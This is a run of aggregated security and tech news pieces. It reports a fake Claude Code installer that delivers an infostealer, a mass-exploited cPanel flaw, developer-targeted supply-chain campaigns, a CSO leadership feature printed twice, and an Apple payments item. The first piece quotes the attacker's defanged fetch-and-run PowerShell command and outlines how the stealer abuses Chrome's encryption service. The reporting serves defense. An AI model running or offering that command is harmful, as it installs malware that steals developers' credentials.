Developers looking for Anthropic’s increasingly popular Claude Code tool are now being lured into downloading malware.
According to researchers at Ontinue, attackers are abusing a fake Claude Code installer to deliver a previously undocumented PowerShell payload. The malware is designed to evade detection, recover browser encryption material, and steal sensitive data from developer systems.
“Developers hold the keys to an organization’s most sensitive assets – intellectual property, cloud infrastructure, CI/CD pipelines,” said Vineeta Sangaraju, AI Research Engineer at Black Duck. “They also, by necessity, need the freedom to download and install software. That combination makes them a high-value target.”
Ontinue researchers said that everything possibly detectable on the attack chain is wrapped within the PowerShell loader, complicating detection. “Two standard API-chain rule sets we evaluated against the binary returned no matches,” they said in a blog post.
The malware has “geographic exclusion” enabled, which has it scan the host’s Windows regions settings against a list of to-exclude geographies, namely all the CIS member states and Iran, and immediately abort execution if there’s a match.

Campaign replaces Claude Code’s legitimate one-line setup
According to Ontinue, the campaign depends on fake installer pages impersonating Claude Code distribution channels. However, rather than delivering Anthropic’s legitimate one-line installation routine, “irm https[:]//claude[.]ai/install.ps1 | iex,” the pages serve attacker-controlled PowerShell commands (“irm events[.]msft23[.]com | iex”) that initiate a staged payload chain.
Once executed, the malicious routine deploys multiple components intended to establish persistence while minimizing behavioral indicators typically associated with commodity malware loaders.
“Everything readily detected, SQLite database access, archive construction, HTTPS exfiltration, scheduled-task persistence, and the process-injection chain itself, resides exclusively within the PowerShell loader,” the researchers said, adding that the native helper exposes no networking, cryptographic, or file-enumeration imports.
The only telling sign is a single indirect COM vtable invocation, they noted.
A list of things the malware can do, while hiding from the prying eyes, includes geographic exclusion, ID collection, browser enumeration, v10/v20 key handling, PowerShell architecture matching and launch, decryption and collection, exfiltration, and persistence.
“Swapping a legitimate installer for a malicious one is not a new attack,” Sangaraju pointed out. “However, what makes this ongoing campaign notable is the precision with which it was built to evade the detection methods that most security teams rely on today. The malicious activity is deliberately structured to look benign to scanners.”
Chrome elevation services were abused to crack encryption
The researchers also wrote of the malware abusing Chrome Elevation Services to recover encryption material associated with Application-Bound Encryption (ABE) protections. The payload leverages the IElevator2 COM interface in Chrome to retrieve (ABE) encryption keys.
This capability helped attackers access browser-protected data normally inaccessible by infostealers. Google introduced ABE in Chrome 127 in July 2024, specifically to keep commodity stealers from lifting cookies and saved passwords from the SQLite databases.
Ontinue stopped short of making firm attribution claims as it found no match with published TTPs associated with popular families like Lumma, StealC, Vidar, EDDIESTEALER, Katz, VoidStealer, Storm, and XenoSteler, among others. The closest the researchers got to a match was with Glove Stealer, which also abuses IElevator, but they dismissed a direct attribution, citing six differing aspects.
A YARA ruleset and a set of indicators of compromise (IOCs) were shared through GitHub repositories to support detection, with researchers recommending an additional set of best practices. These included enforcing PowerShell Constrained Language Mode, enabling phishing-resistant MFA authentication, enabling and verifying AMSI tamper protection, and blocking newly registered domains.
View the full article
Apple today announced that Tap to Pay on iPhone is now available in South Africa, allowing merchants to accept contactless payments using only their iPhone and a partner-enabled iOS app.


The feature lets businesses of any size accept contactless credit and debit cards, Apple Pay, and other digital wallets at checkout. Merchants prompt customers to hold their card, iPhone, Apple Watch, or other digital wallet near the merchant's device, with the payment completed via NFC technology. No additional hardware or payment terminal is required.

iStore Pay and Yoco are the first payment platforms in South Africa to support the feature. The launch supports Mastercard and Visa, with American Express support coming soon.

Tap to Pay on iPhone first launched in the United States in February 2022 and has been expanding steadily ever since. A major wave of rollouts across 2025 brought the feature to dozens of new markets, including 18 new countries in May, five more European countries in September, and launches in Singapore and Hong Kong in December. Malaysia followed in April 2026, and Apple confirmed at the start of this year that the feature had reached 50 markets globally.

As with all Tap to Pay on iPhone transactions, privacy is built in. Transactions are encrypted and processed through the device's Secure Element, and Apple says it has no knowledge of what is purchased or who is buying it. Card numbers and transaction data are not stored on the device or Apple's servers.

Tap to Pay on iPhone requires an iPhone XS or later running the latest version of iOS. Tags: South Africa, Tap to Pay on iPhone
This article, "Tap to Pay on iPhone Launches in South Africa" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
A newly disclosed cPanel vulnerability is being exploited at scale, giving attackers a route into web hosting environments that many enterprises may not monitor closely. Analysts say the risk highlights weak visibility into hosting supply chains.
The flaw, tracked as CVE-2026-41940, has been used to deploy backdoors, plant SSH keys, steal credentials, and compromise hosting systems, according to researchers at XLab. The researchers linked some of the activity to a long-running threat group they call Mr_Rot13.
For CISOs, the worry is not just the bug, but where it sits. cPanel and similar tools often operate at the edge of the enterprise, managing websites, portals, and hosted applications. If they are exposed to the internet and not monitored with the same rigor as endpoints, cloud workloads, or core business systems, they can become attractive entry points for attackers.
“This is a classic aggregator-level attack: instead of targeting individual companies, threat actors compromise the centralized management layer that aggregates hundreds of unrelated tenants on the same server,” said Sunil Varkey, a cybersecurity analyst.
XLab said exploitation began after the vulnerability was publicly disclosed in late April. The researchers observed more than 2,000 attacker source IPs involved in automated attacks. The activity included cryptomining, ransomware deployment, botnet propagation, backdoor installation, and data theft, suggesting the flaw has drawn broad attacker interest.

Varkey said security researchers estimate that more than 40,000 servers may have been at risk in the initial wave alone.
“The speed and scale of exploitation after CVE-2026-41940’s disclosure should tell CISOs that internet-facing control panels are now high-priority exploitation targets, not just administrative utilities,” said Sakshi Grover, senior research manager for IDC Asia Pacific Cybersecurity Services.
Keith Prabhu, founder and CEO of Confidis, said the speed of exploitation shows that internet-facing management planes now have little to no grace period once a critical authentication-bypass flaw becomes public.
Distributed scanning infrastructure and botnets have made attack automation easier to scale, he said, increasing the chances that high-impact flaws will be exploited soon after disclosure.
Mr_Rot13 has operated with a low detection rate for about six years, according to XLab. Its tooling includes a cross-platform remote control program, PHP webshells, JavaScript credential stealers, and components designed to collect SSH data, bash history, database passwords, and cPanel virtual aliases.
“Many organizations have improved visibility across endpoints, cloud workloads, and SaaS platforms, but shared hosting, control panels, web shells, and Linux administrative layers are still often treated as operational infrastructure rather than high-risk attack surfaces,” Grover said.
Grover added that the gap is also about whether the right tools are watching this layer at all. Many security products are not deployed or tuned for cPanel-layer activity, which can leave even mature security teams with limited visibility into the hosting control plane.
The enterprise risk may extend beyond organizations that directly run cPanel. Many companies rely on hosting providers, managed service providers, marketing agencies, and external web teams to operate public-facing sites, customer portals, microsites, and application infrastructure. That can make exposure difficult to identify when security teams do not have direct visibility into the hosting stack.
Steps for security teams
Security teams should first determine whether any internet-exposed cPanel servers were accessible during the exploitation window, Varkey said.
The response should go beyond applying the vendor fix, including credential rotation, checks for unauthorized SSH keys, webshell hunting, review of anomalous processes, and signs that attackers modified login pages or planted persistence mechanisms.
Prabhu said organizations should treat potential exposure as an incident response matter, not just a patch management task. A review should include session and authentication logs, persistence hunting, identity and credential checks, web application compromise analysis, and correlation of logs and telemetry, he said.
Security teams should pay particular attention to data exfiltration channels that may not be covered by standard monitoring tools, according to Grover.
Organizations should also review hosted website content for injected scripts and examine outbound traffic for Telegram-based exfiltration, Grover said. The campaign has reportedly used Telegram to route stolen data, including bash history, SSH credentials, database passwords, and cPanel aliases, which may not be flagged by standard data-loss prevention or egress monitoring tools.
For internet-facing management systems, patching timelines can no longer be measured in days. Security teams need to move within hours, Varkey said.
View the full article
I spent the first week of April reading three separate threat intelligence reports that, on the surface, had nothing in common. One covered a North Korean campaign that had published over 1,700 malicious packages across five open-source ecosystems. Another detailed a malware operation using a Zig-compiled binary to silently infect every IDE on a developer’s machine. The third walked through a cascading supply chain compromise that turned a trusted vulnerability scanner into a credential-harvesting weapon.
Three different threat actor sets. Three different technical approaches. One shared conclusion: developer workstations are now the highest-value initial access target in enterprise environments.
This is not a supply chain security story, at least not in the way most security leaders think about supply chain risk. This is a story about why attackers have independently arrived at the same strategic calculation and what that convergence should tell us about where our defensive investments are misallocated.
The pattern hiding in plain sight
The Contagious Interview campaign, attributed to North Korean threat actors, crossed a scale threshold in early April when Socket researchers reported that the operation had spread to npm, PyPI, Go Modules, crates.io and Packagist simultaneously. The packages impersonate legitimate developer tooling. Once installed, they function as malware loaders that steal browser data, cryptocurrency wallet credentials and password manager contents. The operation has been running since January 2025, but the expansion to five ecosystems in parallel signals a factory-model approach to developer targeting.
Separately, the GlassWorm campaign evolved from malicious IDE extensions into something more ambitious. Aikido Security researchers discovered a fake WakaTime extension on OpenVSX that bundled a Zig-compiled native binary alongside its JavaScript code. The binary does not operate within the extension sandbox. It runs with full operating system access, scans the machine for every compatible IDE and silently installs a second-stage dropper across all of them. The malware avoids execution on Russian systems and uses Solana blockchain infrastructure for command and control. This is not a smash-and-grab credential theft. It is persistent, cross-platform and designed to survive the removal of any single extension.
Then there is TeamPCP, which executed a cascading compromise that started with Aqua Security’s Trivy vulnerability scanner in mid-March and chained through Checkmarx KICS, LiteLLM and the Telnyx Python SDK. Each compromise provided the credentials needed to reach the next target. The malware ran inside build pipelines and developer machines, stealing cloud tokens, CI/CD secrets and service account credentials. One security tool compromise became the launchpad for four more.
These three campaigns share no infrastructure, no malware families and no apparent coordination. That is precisely why their convergence matters. When unrelated threat actors independently arrive at the same targeting strategy, they are responding to the same structural incentive. In this case, the incentive is straightforward: developer machines are where the keys live.
The economics that drive the convergence
A typical developer workstation holds SSH keys, cloud provider credentials, container registry tokens, Git authentication tokens and CI/CD pipeline secrets. Many developers have administrative access to internal package registries and deployment infrastructure. Their machines often sit outside the hardened perimeter that security teams build around production systems.
From an attacker’s perspective, compromising a single developer is equivalent to a supply chain attack without the complexity of compromising an upstream package registry. You do not need to poison a package that thousands of organizations use. You just need one developer who has push access to a production deployment pipeline. The access-to-effort ratio is simply better than attacking production infrastructure directly. Production systems have monitoring, network segmentation and incident response playbooks built around them. Developer workstations, by contrast, are often trusted implicitly because the people who use them are trusted implicitly.
Google’s Cloud Threat Horizons report for the first half of 2026 documented exactly this pattern: threat actors used a trojanized application to gain a foothold on a developer workstation, then leveraged authenticated sessions and available credentials to pivot into cloud resources. Within 72 hours, they had moved from a developer’s local environment to full cloud administration access by abusing OpenID Connect trust between a CI/CD provider and the cloud platform.
The Security Boulevard analysis of the March 2026 attack wave framed this dynamic as a “Developer Credential Economy,” arguing that these campaigns should not be viewed as isolated incidents but as evidence of a black market for highly privileged developer credentials. That framing is useful because it explains why we are seeing simultaneous but independent campaigns targeting the same environment. The market price for developer access has risen because the downstream value of that access has risen.
What this should change for security leaders
Most organizations treat developer environment security as an extension of endpoint protection. Developers get the same EDR agent, the same patch management and the same access controls as every other employee. Some organizations go further and enforce code signing or require multi-factor authentication for package registry access. But few treat the developer workstation as a distinct attack surface that requires its own security architecture.
The convergence of these three campaigns suggests that distinction is overdue. Developer machines are not just endpoints. They are credential stores, pipeline controllers and trust anchors for the entire software delivery chain. Protecting them requires controls that traditional endpoint security was never designed to provide.
That starts with visibility, which remains the most fundamental gap. Most security operations centers have limited insight into what happens inside IDE extension ecosystems, package manager installations or CI/CD pipeline executions. The GlassWorm campaign exploited OpenVSX, a registry that many security teams do not even monitor. TeamPCP compromised GitHub Actions workflows that run with elevated permissions but often escape the scrutiny applied to production deployments. If your security team cannot tell you which IDE extensions are installed across your developer fleet, you have a blind spot that three different threat actor groups are now actively exploiting.
It extends to architectural decisions about how developer environments are provisioned and isolated. Ephemeral development environments, hardware-bound credentials, restricted network access from build systems and mandatory code review for CI/CD pipeline changes are not new ideas. But they remain uncommon in practice because most organizations have not yet accepted that developer environments require the same defensive investment as production infrastructure.
The most uncomfortable implication is organizational. Developer environment security does not fit neatly into existing security team structures. It sits at the intersection of application security, endpoint security, identity management and supply chain risk. In most organizations, no single team owns that intersection. Application security teams focus on code vulnerabilities. Endpoint teams focus on malware detection. Identity teams focus on access governance. Nobody is watching the IDE extension that just installed a Zig binary with full operating system access. The campaigns of March and April 2026 are exploiting that gap.
Three unrelated threat actors looked at the modern enterprise and independently concluded that the developer workstation offers the best return on investment for initial access. That is not a coincidence. It is a price signal, and the price is set by the gap between the value of developer credentials and the maturity of the controls protecting them. The question for security leaders is whether they will close that gap before the next wave of campaigns arrives to exploit it.
This article is published as part of the Foundry Expert Contributor Network.
Want to join?
View the full article
Serving in the military requires a precise, tactical mindset, and that’s exactly what Barry Hensley espoused during his 24 years in the US Army, where he rose to the rank of colonel.
The military “is where you earn your stripes, showing your soldiers your willingness to jump into a foxhole and pick up a weapon,” says Hensley, CSO of Brown & Brown, an independent insurance brokerage firm.
As a security leader in an industry that is constantly evolving, Hensley has leaned on that in-the-trenches approach as a key part of his leadership ethos, even as the CSO role has grown increasingly strategic.
“A security leader needs to be close enough to the tactical fight to effectively guide the organization’s strategic direction, align with business goals, manage risk and investments, and influence culture,” he explains. Business units need to have confidence in a security leader’s level of expertise in a specific security domain so the leader can properly represent the risks and investments required. 
“Rolling your sleeves up in the middle of a security event is never a bad thing,” Hensley adds. “It shows your willingness to lead from the front and/or support in the most stressful situations.”
And increasingly stressful those situations have become, as the spotlight on CISOs has never shone more brightly. Now alongside increasing responsibilities that include data protection and privacy, third-party and supply chain risk, and regulatory compliance and reporting, CISOs must confront the rise of AI — both in the hands of bad actors and throughout the enterprise. And as the CISO role evolves and grows, many are rising to embrace the opportunity.
According to Foundry’s latest Security Priorities Survey, 95% of top security leaders regularly engage with the board of directors multiple times a month, up from 85% in 2023.
This is helping advance cybersecurity initiatives. The CISO’s elevated prominence is also leading to new reporting structures, the survey found, with 31% of respondents reporting that the top security leader reports directly into the board of directors. Only one in five respondents said their security chief reports into the corporate CIO, “another sign that cybersecurity commands its own infrastructure and leadership outside of IT.”
CSO spoke with Hensley and other 2026 CSO Hall of Fame inductees, about how they are governing as AI initiatives become firmly rooted in the enterprise.
Implementing an AI security framework
AI is a core component of Brown & Brown’s security strategy: enhancing SOC operations, streamlining vulnerability management, determining the risks/rewards of third- and fourth-party partnerships, and boosting security application development, Hensley says. 
“For 2026, publishing an AI security framework is our top priority to enable the business to move fast — safely,” he says. His staff is partnering with the firm’s AI engineering and enablement teams to perform AI risk assessments and ensure that AI is fit for purpose and used responsibly through the company’s AI Governance Working Group.
“AI is top of mind for our leaders and a prominent topic with the board of directors, serving as a key consideration and differentiator for our business,” Hensley says.
Companies need governance frameworks that require security reviews before any AI capability is deployed, agrees Shaun Khalfan, senior vice president and CISO of PayPal. This ensures use cases are evaluated against security requirements, data sensitivity, operational risk, and business impact.
“This is why I am a strategic business advisor for major AI business decisions at PayPal,” says Khalfan, whose team is applying advanced risk detection technology and oversight, including machine learning models running in real-time that evaluate over a billion transactions per month. 
The work includes maintaining tight risk and business alignment, incorporating new products into existing compliance and risk frameworks, and adapting them to the unique characteristics of each product, he says. 
Move fast, keep risk at bay
Like Hensley, Jeff Trudeau, CSO of Chime, says the role is fundamentally shifting from a control function to a strategic partner in how the business adopts AI responsibly. At Chime, that means being embedded early in how AI is built and deployed, not reviewing it after the fact, Trudeau says.
“We’re focused on three areas: securing AI systems themselves, governing how AI is used across the company, and helping leadership make clear risk/reward decisions as we scale,” he says.
Noting that AI increases both speed and surface area, Trudeau says his role is to ensure the firm can move fast without introducing unacceptable risk. “That requires tighter integration with engineering, product, and data teams, as well as more direct engagement with executive leadership and the board on how AI changes our risk posture.”
Khalfan also characterizes himself as a strategic CISO with a strong operational and engineering foundation. He strongly believes that a well-defined security strategy aligned to business goals is essential for the success of any cybersecurity organization.
“Security cannot operate as a separate function; it must be embedded in how the business grows, innovates, and continues to earn trust,” he says, adding that “strategy without execution is just theory. We operate in a threat landscape that changes daily, and there are moments when tactical action is critical to managing immediate risk.”
Rapid AI adoption is a perfect example, he says. Echoing Trudeau, Khalfan believes the CISO must help the organization move fast while still protecting customers, data, infrastructure, and reputation.
“The best CISOs know how to balance both, thinking long-term while acting decisively in the short term,” he says. 
All roads lead back to trust and strong governance, he notes. “Trust is the foundation of both technology and business. You must build trust in the system across customers, merchants, partners, and infrastructure to ensure AI and agent-driven transactions are reliable, secure, and verifiable.”
AI is creating the greatest security challenges
For Trudeau, the biggest challenge of the burgeoning AI era is the pace of change. AI is accelerating how software is built, how attacks are executed, and how quickly systems evolve. Traditional security models, periodic reviews, and static controls don’t keep up, he says.
“We’re addressing that by shifting to more continuous, embedded security practices. That includes integrating security into development workflows, investing in detection and response capabilities that adapt in real-time, and building stronger data governance around how sensitive information is accessed and used by AI systems,” Trudeau says.
At the same time, the focus is on maintaining trust at scale. “As we introduce more AI-driven experiences, we have to be clear about how systems behave, how decisions are made, and where human oversight remains,” Trudeau says. “That’s as much a product and trust challenge as it is a technical one.”
AI is also impacting what Brown & Brown is seeing with phishing campaigns, notes Hensley. “AI is maturing in its ability to impersonate individuals, both voice and video, while quickly generating supporting documents to further convince teammates that a fraudulent request is genuine.”
A preview of Anthropic’s Mythos release shows that AI can now rapidly discover previously unknown vulnerabilities and automate their exploitation, Hensley says. “This changes the paradigm. Vulnerability management will likely become a higher priority for organizations as they cannot wait weeks to patch hosts based on a perceived risk tolerance of mitigating controls.”
Most organizations will have to empower their IT platform providers to deploy automation for near-real-time patching — while holding them accountable for the contracted service-level availability, he says.
Managing identity, data, and humans
AI is not the only challenge CISOs have to contend with. Khalfan says that identity, data security, and context are his most important challenges to solve for.
“Identity is becoming more complex, as humans, machines, APIs, and autonomous agents all interact with critical systems,” he says. “Knowing who — or what — is requesting access and ensuring the right level of trust and least privilege is fundamental.”
Context is the multiplier, Khalfan adds. “Security decisions without business context create unnecessary friction, and business decisions without security context create unnecessary risk. Security leaders must create systems that make both visible in real-time.”
To execute, his team focuses heavily on getting the fundamentals right: strong data governance, dynamic policy tuning, continuous validation of the control environment, frequent deployment of security improvements, and designing controls that are embedded into workflows rather than added afterward, Khalfan says.
“Security at scale is less about isolated controls and more about building resilient systems that continuously adapt,” he says.
As much as AI has added new trials, Hensley finds that the human element, along with the expanding attack surface, remain the greatest security challenges. This includes the arms race between attackers and defenders. “Sophisticated social engineering is at an all-time high, challenging our teammates to be not only vigilant but also often the first line of defense,” he says.
To stay ahead, “we are tackling from all angles, including security awareness training, enabling new advanced AI features in our security tools, and taking more proactive actions on behalf of our teammates based on risk/reward evaluations,” Hensley says.
Hall of Fame advice on meeting the current CISO moment
Meeting today’s cyber leadership challenges requires CISOs to lead from the front — something both Hensley and Khalfan practice. That means only adopting AI that is secure and trusted. “Security should not be the department of ‘no’; it should help business partners move faster with confidence, Khalfan says.
Leading from the front also means challenging the status quo, and viewing yourself as a business partner/risk advisor, Hensley says.
For Trudeau, it’s about being able to translate risk into business terms.
Stay close to the business. “If you do not understand how your company creates value, you cannot effectively protect it,” Khalfan says. “Security leaders need to speak the language of growth, customer trust, and operational resilience, not just technical risk.”
Trudeau agrees, saying that security leaders must align their work directly to business outcomes. “If security is seen as separate from growth, you’ll always be reacting instead of shaping decisions.”
Be the enabler. “The best CISOs help the business move faster and safer, not slower,” Khalfan says. “Your job is not to create friction everywhere; it is to create friction where the risk is highest and remove it where trust can be increased through better design.”
Engage early. “The earlier security is involved in product and AI development, the more leverage you have to influence outcomes without slowing teams down,” Trudeau notes.
Khalfan echoes that, saying that data security, identity, and observability are the foundations on which trusted AI systems are built. Business and cyber teams must work hand in hand to ensure those outcomes are achieved, he says. 
“Whether it is defending against AI-enabled threats, protecting AI infrastructure, or evaluating the risk and reward of AI innovation, security must be involved early, not after deployment,” he adds.
Stay proactively compliant. Khalfan says that PayPal’s security organization continually monitors and updates its governance and requirements based on the evolving regulatory frameworks.
Solve business problems. This is a sure-fire way to meet the today’s cyber challenges and raise your profile as CISO. “When security becomes a driver of trust, speed, and competitive advantage, your seat at the table becomes permanent,” Khalfan says.
For example, Khalfan drove company-wide bot protection initiatives, a collaborative, multi-team effort that enhanced fraud prevention. It greatly reduced fraudulent traffic at the top of the process, resulting in higher quality customer engagement, he says.
Talk the talk. If you want to understand how to secure AI, you need to actively use AI, Khalfan stresses. “Security leaders cannot govern what they do not understand. Hands-on experience creates credibility and better decision-making,” he says.
This often requires investing in fluency beyond security to understand how AI systems work, how your company builds products, and what leadership cares about, Trudeau says.
Build credibility through consistency. “As the scope of the role expands, especially with AI, leaders are looking for clear, pragmatic guidance, not theoretical risk models,” Trudeau says.
There’s no ‘I’ in team
A core part of raising to today’s challenges and elevating your CISO role requires security leaders to bring your teammates along. They will always be your greatest resource, Hensley says. 
“My military experience is part of my DNA and has shaped every part of my life, especially how I think of teammate development, building highly cohesive functioning teams, and prioritizing what is most important,” he says.
So many things in life will come and go, but your impact on others will impact generations, Hensley adds. They carry your values forward from culture, ethics, and standards.
“My legacy will be the teammates that I have served alongside through my career,” he says. “I encourage security leaders to focus on the impact you can make on your team every day — it will ultimately serve to elevate your profile and leave a lasting mark.”
View the full article
Serving in the military requires a precise, tactical mindset, and that’s exactly what Barry Hensley espoused during his 24 years in the US Army, where he rose to the rank of colonel.
The military “is where you earn your stripes, showing your soldiers your willingness to jump into a foxhole and pick up a weapon,” says Hensley, CSO of Brown & Brown, an independent insurance brokerage firm.
As a security leader in an industry that is constantly evolving, Hensley has leaned on that in-the-trenches approach as a key part of his leadership ethos, even as the CSO role has grown increasingly strategic.
“A security leader needs to be close enough to the tactical fight to effectively guide the organization’s strategic direction, align with business goals, manage risk and investments, and influence culture,” he explains. Business units need to have confidence in a security leader’s level of expertise in a specific security domain so the leader can properly represent the risks and investments required. 
“Rolling your sleeves up in the middle of a security event is never a bad thing,” Hensley adds. “It shows your willingness to lead from the front and/or support in the most stressful situations.”
And increasingly stressful those situations have become, as the spotlight on CISOs has never shone more brightly. Now alongside increasing responsibilities that include data protection and privacy, third-party and supply chain risk, and regulatory compliance and reporting, CISOs must confront the rise of AI — both in the hands of bad actors and throughout the enterprise. And as the CISO role evolves and grows, many are rising to embrace the opportunity.
According to Foundry’s latest Security Priorities Survey, 95% of top security leaders regularly engage with the board of directors multiple times a month, up from 85% in 2023.
This is helping advance cybersecurity initiatives. The CISO’s elevated prominence is also leading to new reporting structures, the survey found, with 31% of respondents reporting that the top security leader reports directly into the board of directors. Only one in five respondents said their security chief reports into the corporate CIO, “another sign that cybersecurity commands its own infrastructure and leadership outside of IT.”
CSO spoke with Hensley and other 2026 CSO Hall of Fame inductees, about how they are governing as AI initiatives become firmly rooted in the enterprise.
Implementing an AI security framework
AI is a core component of Brown & Brown’s security strategy: enhancing SOC operations, streamlining vulnerability management, determining the risks/rewards of third- and fourth-party partnerships, and boosting security application development, Hensley says. 
“For 2026, publishing an AI security framework is our top priority to enable the business to move fast — safely,” he says. His staff is partnering with the firm’s AI engineering and enablement teams to perform AI risk assessments and ensure that AI is fit for purpose and used responsibly through the company’s AI Governance Working Group.
“AI is top of mind for our leaders and a prominent topic with the board of directors, serving as a key consideration and differentiator for our business,” Hensley says.
Companies need governance frameworks that require security reviews before any AI capability is deployed, agrees Shaun Khalfan, senior vice president and CISO of PayPal. This ensures use cases are evaluated against security requirements, data sensitivity, operational risk, and business impact.
“This is why I am a strategic business advisor for major AI business decisions at PayPal,” says Khalfan, whose team is applying advanced risk detection technology and oversight, including machine learning models running in real-time that evaluate over a billion transactions per month. 
The work includes maintaining tight risk and business alignment, incorporating new products into existing compliance and risk frameworks, and adapting them to the unique characteristics of each product, he says. 
Move fast, keep risk at bay
Like Hensley, Jeff Trudeau, CSO of Chime, says the role is fundamentally shifting from a control function to a strategic partner in how the business adopts AI responsibly. At Chime, that means being embedded early in how AI is built and deployed, not reviewing it after the fact, Trudeau says.
“We’re focused on three areas: securing AI systems themselves, governing how AI is used across the company, and helping leadership make clear risk/reward decisions as we scale,” he says.
Noting that AI increases both speed and surface area, Trudeau says his role is to ensure the firm can move fast without introducing unacceptable risk. “That requires tighter integration with engineering, product, and data teams, as well as more direct engagement with executive leadership and the board on how AI changes our risk posture.”
Khalfan also characterizes himself as a strategic CISO with a strong operational and engineering foundation. He strongly believes that a well-defined security strategy aligned to business goals is essential for the success of any cybersecurity organization.
“Security cannot operate as a separate function; it must be embedded in how the business grows, innovates, and continues to earn trust,” he says, adding that “strategy without execution is just theory. We operate in a threat landscape that changes daily, and there are moments when tactical action is critical to managing immediate risk.”
Rapid AI adoption is a perfect example, he says. Echoing Trudeau, Khalfan believes the CISO must help the organization move fast while still protecting customers, data, infrastructure, and reputation.
“The best CISOs know how to balance both, thinking long-term while acting decisively in the short term,” he says. 
All roads lead back to trust and strong governance, he notes. “Trust is the foundation of both technology and business. You must build trust in the system across customers, merchants, partners, and infrastructure to ensure AI and agent-driven transactions are reliable, secure, and verifiable.”
AI is creating the greatest security challenges
For Trudeau, the biggest challenge of the burgeoning AI era is the pace of change. AI is accelerating how software is built, how attacks are executed, and how quickly systems evolve. Traditional security models, periodic reviews, and static controls don’t keep up, he says.
“We’re addressing that by shifting to more continuous, embedded security practices. That includes integrating security into development workflows, investing in detection and response capabilities that adapt in real-time, and building stronger data governance around how sensitive information is accessed and used by AI systems,” Trudeau says.
At the same time, the focus is on maintaining trust at scale. “As we introduce more AI-driven experiences, we have to be clear about how systems behave, how decisions are made, and where human oversight remains,” Trudeau says. “That’s as much a product and trust challenge as it is a technical one.”
AI is also impacting what Brown & Brown is seeing with phishing campaigns, notes Hensley. “AI is maturing in its ability to impersonate individuals, both voice and video, while quickly generating supporting documents to further convince teammates that a fraudulent request is genuine.”
A preview of Anthropic’s Mythos release shows that AI can now rapidly discover previously unknown vulnerabilities and automate their exploitation, Hensley says. “This changes the paradigm. Vulnerability management will likely become a higher priority for organizations as they cannot wait weeks to patch hosts based on a perceived risk tolerance of mitigating controls.”
Most organizations will have to empower their IT platform providers to deploy automation for near-real-time patching — while holding them accountable for the contracted service-level availability, he says.
Managing identity, data, and humans
AI is not the only challenge CISOs have to contend with. Khalfan says that identity, data security, and context are his most important challenges to solve for.
“Identity is becoming more complex, as humans, machines, APIs, and autonomous agents all interact with critical systems,” he says. “Knowing who — or what — is requesting access and ensuring the right level of trust and least privilege is fundamental.”
Context is the multiplier, Khalfan adds. “Security decisions without business context create unnecessary friction, and business decisions without security context create unnecessary risk. Security leaders must create systems that make both visible in real-time.”
To execute, his team focuses heavily on getting the fundamentals right: strong data governance, dynamic policy tuning, continuous validation of the control environment, frequent deployment of security improvements, and designing controls that are embedded into workflows rather than added afterward, Khalfan says.
“Security at scale is less about isolated controls and more about building resilient systems that continuously adapt,” he says.
As much as AI has added new trials, Hensley finds that the human element, along with the expanding attack surface, remain the greatest security challenges. This includes the arms race between attackers and defenders. “Sophisticated social engineering is at an all-time high, challenging our teammates to be not only vigilant but also often the first line of defense,” he says.
To stay ahead, “we are tackling from all angles, including security awareness training, enabling new advanced AI features in our security tools, and taking more proactive actions on behalf of our teammates based on risk/reward evaluations,” Hensley says.
Hall of Fame advice on meeting the current CISO moment
Meeting today’s cyber leadership challenges requires CISOs to lead from the front — something both Hensley and Khalfan practice. That means only adopting AI that is secure and trusted. “Security should not be the department of ‘no’; it should help business partners move faster with confidence, Khalfan says.
Leading from the front also means challenging the status quo, and viewing yourself as a business partner/risk advisor, Hensley says.
For Trudeau, it’s about being able to translate risk into business terms.
Stay close to the business. “If you do not understand how your company creates value, you cannot effectively protect it,” Khalfan says. “Security leaders need to speak the language of growth, customer trust, and operational resilience, not just technical risk.”
Trudeau agrees, saying that security leaders must align their work directly to business outcomes. “If security is seen as separate from growth, you’ll always be reacting instead of shaping decisions.”
Be the enabler. “The best CISOs help the business move faster and safer, not slower,” Khalfan says. “Your job is not to create friction everywhere; it is to create friction where the risk is highest and remove it where trust can be increased through better design.”
Engage early. “The earlier security is involved in product and AI development, the more leverage you have to influence outcomes without slowing teams down,” Trudeau notes.
Khalfan echoes that, saying that data security, identity, and observability are the foundations on which trusted AI systems are built. Business and cyber teams must work hand in hand to ensure those outcomes are achieved, he says. 
“Whether it is defending against AI-enabled threats, protecting AI infrastructure, or evaluating the risk and reward of AI innovation, security must be involved early, not after deployment,” he adds.
Stay proactively compliant. Khalfan says that PayPal’s security organization continually monitors and updates its governance and requirements based on the evolving regulatory frameworks.
Solve business problems. This is a sure-fire way to meet the today’s cyber challenges and raise your profile as CISO. “When security becomes a driver of trust, speed, and competitive advantage, your seat at the table becomes permanent,” Khalfan says.
For example, Khalfan drove company-wide bot protection initiatives, a collaborative, multi-team effort that enhanced fraud prevention. It greatly reduced fraudulent traffic at the top of the process, resulting in higher quality customer engagement, he says.
Talk the talk. If you want to understand how to secure AI, you need to actively use AI, Khalfan stresses. “Security leaders cannot govern what they do not understand. Hands-on experience creates credibility and better decision-making,” he says.
This often requires investing in fluency beyond security to understand how AI systems work, how your company builds products, and what leadership cares about, Trudeau says.
Build credibility through consistency. “As the scope of the role expands, especially with AI, leaders are looking for clear, pragmatic guidance, not theoretical risk models,” Trudeau says.
There’s no ‘I’ in team
A core part of rising to today’s challenges and elevating your CISO role requires security leaders to bring your teammates along. They will always be your greatest resource, Hensley says. 
“My military experience is part of my DNA and has shaped every part of my life, especially how I think of teammate development, building highly cohesive functioning teams, and prioritizing what is most important,” he says.
So many things in life will come and go, but your impact on others will impact generations, Hensley adds. They carry your values forward from culture, ethics, and standards.
“My legacy will be the teammates that I have served alongside through my career,” he says. “I encourage security leaders to focus on the impact you can make on your team every day — it will ultimately serve to elevate your profile and leave a lasting mark.”
View the full article
I’ve been a CISO for two separate companies, know several CISOs personally, and interact with many others through various cybersecurity forums. We all have one thing in common. We can tell you our patching SLA numbers off the top of our heads. Ninety-five percent of criticals closed in 14 days. Eighty-something on highs. The board slide is green. The auditors are satisfied. The client questionnaires come back clean.
Then I ask a different question: what still needs to be done? And the tone shifts from the confident “We’ve got it all covered” to “Wellll… we’ve got some legacy tech debt holding us back.”
What they’re really saying, when someone’s been in the role long enough to stop performing, is usually some version of this: the stuff we closed fast was the stuff that was cheap to close. The stuff that’s still open is the stuff that would require us to re-architect a service, take a critical system offline or fight with a business owner who doesn’t want to hear it. So, we keep closing easy criticals to keep the dashboard green, and the hard problems age quietly in the backlog where no one looks.
